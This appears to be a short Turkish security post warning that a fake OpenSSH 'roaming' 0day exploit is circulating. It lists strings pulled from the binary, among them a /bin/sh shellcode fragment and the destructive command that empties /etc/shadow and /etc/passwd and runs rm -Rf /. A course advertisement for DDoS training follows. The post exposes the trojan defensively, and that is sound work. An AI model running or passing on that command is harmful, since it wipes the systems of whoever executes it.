OpenSSH "ROAMING" zafiyeti husunda sahte exploit dolaşmaktadır. Exploiti deneyim derken sıkıntı yaşamamak gerek.
Exploiti incelerken dikkatimi ceken hususlar aşağıda belirttim. *echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf / * kısmına dikkat!!! Target : openssh 4.7 to 7.1 roaming Type : 0day Author : You know me Exec : %s <server> <port> - Abort - Need ROOT to bind to raw socket!! + OK Starting.. [ ] Use IP and port (mandatory) ;*3$" Rfh-c h/sh h/bin echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf / GCC: (Debian 4.9.2-10) 4.9.2 GCC: (Debian 4.8.4-1) 4.8.4
------------------- DDOS Saldırıları ve Korunma Yolları Eğitimi İstanbul: 27-28 Şubat 2016 Ankara: 03-04 Mart 2016 -------------------
